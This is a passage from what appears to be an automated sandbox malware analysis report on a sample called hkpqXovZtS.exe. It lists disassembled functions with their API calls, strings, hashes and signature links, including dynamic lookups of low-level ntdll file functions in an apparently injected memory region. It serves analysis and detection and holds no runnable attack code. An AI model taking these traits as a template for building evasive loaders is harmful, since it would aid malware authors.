</p>, xrefs: 00418DDA

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateHeap_malloc_wcslen
String ID: </p>$</style>$<br>$<style>
API String ID: 4208083856-1200123991
Opcode ID: bf4a6cacaf11a2331b56bfbb5b69d025c4880b8f0f469619230378f04e9d8281
Instruction ID: 302fd652b940286076728f1323958995ddfdbf4caa55d64720e4c674d0eba5b4
Opcode Fuzzy Hash: bf4a6cacaf11a2331b56bfbb5b69d025c4880b8f0f469619230378f04e9d8281
Instruction Fuzzy Hash: 8641C235640352A5CB306B69A8027FB73A4EF65754F68441FE9C1972C0EF6C9DC2829D

Function 0041909A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000,00000000,?,?), ref: 004190B0
GetParent.USER32(?), ref: 004190E8
GetParent.USER32(?), ref: 00419119
ShowWindow.USER32(?,00000005,?,00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0041916A
ShowWindow.USER32(00000000,00000005,00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0041918A

Strings

RarHtmlClassName, xrefs: 00419132

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ShowWindow$Parent
String ID: RarHtmlClassName
API String ID: 2379590318-1658105358
Opcode ID: 9c20ba0b380a818c058f9aea319f12467c07711d751414c825dc0ac33fb6d42f
Instruction ID: 336c8c3e8339fcc274db4861d5faaa663e954b19a3071e9ea0030f4cefa9c04a
Opcode Fuzzy Hash: 9c20ba0b380a818c058f9aea319f12467c07711d751414c825dc0ac33fb6d42f
Instruction Fuzzy Hash: 5031D031601609BFEB31AF65DC49EAF7BB9EF84740F10491AF81996250D735AD80CBA8

Function 022AC6AE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 022AC676: _free.LIBCMT ref: 022AC69B

_free.LIBCMT ref: 022AC6FC

Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D

_free.LIBCMT ref: 022AC707
_free.LIBCMT ref: 022AC712
_free.LIBCMT ref: 022AC766
_free.LIBCMT ref: 022AC771
_free.LIBCMT ref: 022AC77C
_free.LIBCMT ref: 022AC787

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cf79245f030b3ed4a9fd83b625a98cb3fad30b0f3a246e8cb4ca7d3628d6ff09
Instruction ID: 10d3190b653db7fa8506140d2d43bb54d55b4cfe9b52fa5258bd177d964ee5f3
Opcode Fuzzy Hash: cf79245f030b3ed4a9fd83b625a98cb3fad30b0f3a246e8cb4ca7d3628d6ff09
Instruction Fuzzy Hash: 92117F35960B04FBD520FFF4CC19FCBB79E5F41B00F408D36A29A66859DA28F6048E94

Function 022A0C47 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,022A0915,0229FA72,0229F5AD), ref: 022A0C55
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 022A0C63
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 022A0C7C
SetLastError.KERNEL32(00000000,?,022A0915,0229FA72,0229F5AD), ref: 022A0CCE

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0359cc336175f1970621a1de65f7d9d72cb28ca05c0e660d9f3cea3e88784e87
Instruction ID: f6813886e977ee300e8e341abd556a9089f9bf1fea93a0673d20b91faa2390f0
Opcode Fuzzy Hash: 0359cc336175f1970621a1de65f7d9d72cb28ca05c0e660d9f3cea3e88784e87
Instruction Fuzzy Hash: 9C01C0739393129F9F2055F4BCA8B6A3657EB043B572007A9F01C859F8EF50493CA554

Function 0041D042 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0041D06A

Part of subcall function 0041967E: __getptd.LIBCMT ref: 0041968C
Part of subcall function 0041967E: __getptd.LIBCMT ref: 0041969A

__getptd.LIBCMT ref: 0041D074

Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81

__getptd.LIBCMT ref: 0041D082
__getptd.LIBCMT ref: 0041D090
__getptd.LIBCMT ref: 0041D09B
_CallCatchBlock2.LIBCMT ref: 0041D0C1

Part of subcall function 00419723: __CallSettingFrame@12.LIBCMT ref: 0041976F

Part of subcall function 0041D168: __getptd.LIBCMT ref: 0041D177
Part of subcall function 0041D168: __getptd.LIBCMT ref: 0041D185

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
String ID:
API String ID: 3688206559-0
Opcode ID: adac1376032219a4d2bfb868507661af3c4362346dcdf8190ac2579787bbb348
Instruction ID: 41f91cc97b8cdd72d244d7b1be7b80639e7a0adf2291a42cd0216d34b547817f
Opcode Fuzzy Hash: adac1376032219a4d2bfb868507661af3c4362346dcdf8190ac2579787bbb348
Instruction Fuzzy Hash: AD1126B5D00209EFDB00EFA1C845AED7BB0FF44314F10856AF814A7261EB789A809F58

Function 022AADD8 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 022AAF72

Strings

kL, xrefs: 022AB083
*?, xrefs: 022AAE1B

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _free
String ID: *?$kL
API String ID: 269201875-3099113692
Opcode ID: 85592be7bcee3ab965be2210e7b7ac585b2ae47f3853e059e08f8571b823f5d0
Instruction ID: 4959bf6bf1a630012f89e19d6b9b3e549000affefd430cfc8b28df6093423e69
Opcode Fuzzy Hash: 85592be7bcee3ab965be2210e7b7ac585b2ae47f3853e059e08f8571b823f5d0
Instruction Fuzzy Hash: C0614CB6D1021AAFCB14CFA8C9909EDFBF5EF48310B24816AE855E7704D7759E41CB90

Function 0040835B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408360

Part of subcall function 0040A11F: _wcslen.LIBCMT ref: 0040A125

_swprintf.LIBCMT ref: 0040843A

Part of subcall function 0040B8BD: __vswprintf_c_l.LIBCMT ref: 0040B8D0

MoveFileW.KERNEL32(?,00000000), ref: 004084A6
MoveFileW.KERNEL32(00000000,?), ref: 004084E9

Part of subcall function 00410823: _wcsncpy.LIBCMT ref: 0041083A

Strings

rtmp%d, xrefs: 00408427

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: FileMove$H_prolog__vswprintf_c_l_swprintf_wcslen_wcsncpy
String ID: rtmp%d
API String ID: 3681525962-3303766350
Opcode ID: 1e2d587bca62f88247727b3b9e5d7c2d8643540f6b84dfb311df528aed711f35
Instruction ID: 69edc84b86f412ba0bc4d5e90ee985fc46e0113149e1d6e5ea4475ba2e70aa71
Opcode Fuzzy Hash: 1e2d587bca62f88247727b3b9e5d7c2d8643540f6b84dfb311df528aed711f35
Instruction Fuzzy Hash: D1414271901219B6CF20EB62CD459DF777CAF41388F0004BBB595B7182EB7C9B85CAA8

Function 0040F23A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F2A3
GetDlgItem.USER32(?,00000065), ref: 0040F2C7
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F2DC
SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F2F0

Strings

LICENSEDLG, xrefs: 0040F246

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: MessageSend$Item
String ID: LICENSEDLG
API String ID: 3888421826-2177901306
Opcode ID: a35642039d372273213a1fe99bee06fd2d35902f9b74d97e3d1bf5e1df4b77f2
Instruction ID: 2ecf1310ef2f8e42eb6b1dce49f9a550c718bc92f4591b2c0e570435fcc087d6
Opcode Fuzzy Hash: a35642039d372273213a1fe99bee06fd2d35902f9b74d97e3d1bf5e1df4b77f2
Instruction Fuzzy Hash: 6D216B71100248BADB30AF629C42FA73B2DEB85B54F00543BF905B60D1DA7E9901C72C

Function 0041300A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041300F
_memset.LIBCMT ref: 00413033
_memset.LIBCMT ref: 004130AF
_malloc.LIBCMT ref: 004130E2

Strings

lB, xrefs: 004130EE

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset$H_prolog_malloc
String ID: lB
API String ID: 1600808285-323450203
Opcode ID: 030a801b66dce2c921adb79293409b56d158257f867e3469673c05b2b9060ad7
Instruction ID: bf6ea9f9a1acc3d9f1f086f9a60bfa17a1d82c8e39c68d8a0f1b5c27423798e3
Opcode Fuzzy Hash: 030a801b66dce2c921adb79293409b56d158257f867e3469673c05b2b9060ad7
Instruction Fuzzy Hash: EB31F1B1E00616ABDB14AFA5CC057EB76B8FB14319F10012FE105E7281D7789E80C7AC

Function 022A7DD7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\hkpqXovZtS.exe, xrefs: 022A7DDC

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
API String ID: 0-979263065
Opcode ID: 354f00c3d457f032d653564d2e45db8383434b52604e1d58361e2c3354b36447
Instruction ID: 97a1e2c5aa589a0842d6ad3f167310106eb7ac1b69e23c159fdb9709e8416d58
Opcode Fuzzy Hash: 354f00c3d457f032d653564d2e45db8383434b52604e1d58361e2c3354b36447
Instruction Fuzzy Hash: 9421C272A20306AF9B20AFE59DA4D2FF79EEF003647004915F529CBA44EB70DC10CBA4

Function 02291688 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(022910D9,022E4FE8,00000104,?,?,?,022910D9,?), ref: 022916C7

Strings

NtClose, xrefs: 02291760
NtReadFile, xrefs: 02291788
NtQueryInformationFile, xrefs: 02291774
NtCreateFile, xrefs: 0229174C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: FileModuleName
String ID: NtClose$NtCreateFile$NtQueryInformationFile$NtReadFile
API String ID: 514040917-3418994152
Opcode ID: b0f2c84d5b6cf6aa1eba000ffe514cf3080d87db465fb827db25e1bfc87a372e
Instruction ID: 1fa68bd32c3fa71e1f2f928afc59edecfe4835413e74fa392a35f65869a93f93
Opcode Fuzzy Hash: b0f2c84d5b6cf6aa1eba000ffe514cf3080d87db465fb827db25e1bfc87a372e
Instruction Fuzzy Hash: AD21F631AB0302ABFF18EFE6EC46E6537E1BF04B217540855E00EDA16CEAA18461DB16

Function 0040E3E1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(RENAMEDLG,0040D100,?,?,0040E4E1), ref: 0040E45F

Strings

REPLACEFILEDLG, xrefs: 0040E42D
RENAMEDLG, xrefs: 0040E454

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: DialogParam
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 665744214-56093855
Opcode ID: d0ae7a8254853b446899ced58eb6316af1dde2291dfab6f1df2c15f21608e9d9
Instruction ID: f8f97b2682b38a8fc71a6b6bb6a51a983d61d2d2f79ee8623470cc10f718c254
Opcode Fuzzy Hash: d0ae7a8254853b446899ced58eb6316af1dde2291dfab6f1df2c15f21608e9d9
Instruction Fuzzy Hash: 7811E6B0145245EACB11CF12EC45B923F50AB05340F515833F610B63E0C27A9862EB6D

Function 0041D9AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9BC
TlsGetValue.KERNEL32(00000007,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9D3
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DA04

Strings

EncodePointer, xrefs: 0041D9FE
KERNEL32.DLL, xrefs: 0041D9E3, 0041D9E8, 0041D9F3

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: Value$AddressProc
String ID: EncodePointer$KERNEL32.DLL
API String ID: 3000322187-3682587211
Opcode ID: 1e250072d4ee9ee132c2fe2c9afd064dd7989dba9f53a573af72b69805a2044b
Instruction ID: d25419fe086fd572754ca199c9bbd830b30b0ad25c8b5dff7139db05ecbbb2bd
Opcode Fuzzy Hash: 1e250072d4ee9ee132c2fe2c9afd064dd7989dba9f53a573af72b69805a2044b
Instruction Fuzzy Hash: 0FF044B0B05216EB9B21AF35EC059AF3B98DF053A03594173F818D6261DF38DD92D6AC

Function 0041DA25 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,0041DAC0,?,0041F249,00419D04,?,?,?,00419D04,00000000,?), ref: 0041DA37
TlsGetValue.KERNEL32(00000007,?,0041DAC0,?,0041F249,00419D04,?,?,?,00419D04,00000000,?), ref: 0041DA4E
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0041DA7F

Strings

KERNEL32.DLL, xrefs: 0041DA5E, 0041DA63, 0041DA6E
DecodePointer, xrefs: 0041DA79

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: Value$AddressProc
String ID: DecodePointer$KERNEL32.DLL
API String ID: 3000322187-629428536
Opcode ID: 14df8e3696460602dad4f7941c6c8cb2faed605fac57cb0e4ee28b8487a80535
Instruction ID: 47e50f8651cdd332759b97997f636aa46c801bf21f33db7225eb4d830c239e8b
Opcode Fuzzy Hash: 14df8e3696460602dad4f7941c6c8cb2faed605fac57cb0e4ee28b8487a80535
Instruction Fuzzy Hash: 56F0F470B04216EA8B20DB75DC049AB3B98DF003E07548173FC18D2260DB29DD8296EC

Function 022A5C6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,022A5C20,?,?,022A5BE8,022E4FE0,0000003F,?), ref: 022A5C83
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 022A5C96
FreeLibrary.KERNEL32(00000000,?,?,022A5C20,?,?,022A5BE8,022E4FE0,0000003F,?), ref: 022A5CB9

Strings

mscoree.dll, xrefs: 022A5C7C
CorExitProcess, xrefs: 022A5C8E

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 73ce73cabe1e247b2b0c55f77db7c7abdbafdcb83587cf29ef001606c4020e19
Instruction ID: bd4a6da33755e476be7f7b8797c221fe893731e5da8c753d56be4242be729934
Opcode Fuzzy Hash: 73ce73cabe1e247b2b0c55f77db7c7abdbafdcb83587cf29ef001606c4020e19
Instruction Fuzzy Hash: D9F08231D51619FBDB12DBD0ED0EBDEBFB9EF40756F004490F901A1158CB748A10DA90

Function 02291636 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,02291756,NtCreateFile,022E4000,0229110B,022910D9,00E1D8E8,08C2C900,?,022910D9,?), ref: 02291644
GetProcAddress.KERNEL32(00000000,NtSetInformationFile), ref: 02291655
GetProcAddress.KERNEL32(022E4020,?), ref: 0229166A

Strings

ntdll.dll, xrefs: 0229163F
NtSetInformationFile, xrefs: 0229164A

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: NtSetInformationFile$ntdll.dll
API String ID: 667068680-3010545110
Opcode ID: 83a1bcde81f5a1ed0efd44046f3c15edbc08076c16815332832a3f6d6f127157
Instruction ID: 76de984cd848d439f46eeb613293187f5f7893128be8e041de0bf03391416cf6
Opcode Fuzzy Hash: 83a1bcde81f5a1ed0efd44046f3c15edbc08076c16815332832a3f6d6f127157
Instruction Fuzzy Hash: AAE0A575D94301EFAB09EFE4F80DB1A3BE9BF483817004C69F959C6150D7309520EB25

Function 0041CD91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CDAB

Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81

__getptd.LIBCMT ref: 0041CDBC
__getptd.LIBCMT ref: 0041CDCA

Strings

csm, xrefs: 0041CDA4
MOC, xrefs: 0041CD9D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: MOC$csm
API String ID: 1969926928-1389381023
Opcode ID: 8d58c0e8e9140455f9f2f3fa86026452bc6b404060e1518db8010fc8cd5144eb
Instruction ID: 8b01a33115fb1e61f5b354125ccd4bd540af3bb44677c38c2222110d3557298b
Opcode Fuzzy Hash: 8d58c0e8e9140455f9f2f3fa86026452bc6b404060e1518db8010fc8cd5144eb
Instruction Fuzzy Hash: A8E04FB59401049FC710AB65D486BE937A6FB8A318F1509A7E40CC7362E77CD8C1E5CA

Function 022AC60D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 022AC625

Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D

_free.LIBCMT ref: 022AC637
_free.LIBCMT ref: 022AC649
_free.LIBCMT ref: 022AC65B
_free.LIBCMT ref: 022AC66D

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a61ceaefdea34b30c92998a8b411ce23b714a254bcfbfbd1191bec4e59c227ab
Instruction ID: d4659fa8b43980947e20d5bec7130a7ffc2e948ded38b433fa9f8f89d5dba95f
Opcode Fuzzy Hash: a61ceaefdea34b30c92998a8b411ce23b714a254bcfbfbd1191bec4e59c227ab
Instruction Fuzzy Hash: 1EF01833924601F78910FEFCF599C29B3EAAE84B157581C96F005DBD48C774F9904A98

Function 00415F16 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00415F1B

Part of subcall function 00411CFE: _realloc.LIBCMT ref: 00411D56

Part of subcall function 00419BE4: _malloc.LIBCMT ref: 00419BFE

_memset.LIBCMT ref: 0041616B
_memset.LIBCMT ref: 00416325

Strings

, xrefs: 00416107

Memory Dump Source

